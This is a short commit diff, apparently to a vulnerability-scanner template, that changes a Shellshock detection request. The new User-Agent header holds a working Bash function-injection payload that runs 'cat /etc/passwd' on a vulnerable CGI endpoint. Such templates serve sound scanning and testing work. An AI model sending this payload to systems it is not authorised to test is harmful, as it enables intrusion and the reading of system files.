Improve shellshock payload
parent
86c124a3ae
commit
f4ebffa1bc
|
@ -8,7 +8,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
headers:
|
||||
User-Agent: "{ :;}; echo $(</etc/passwd)"
|
||||
User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'"
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/status"
|
||||
matchers:
|
||||
|
|
Loading…
Reference in New Issue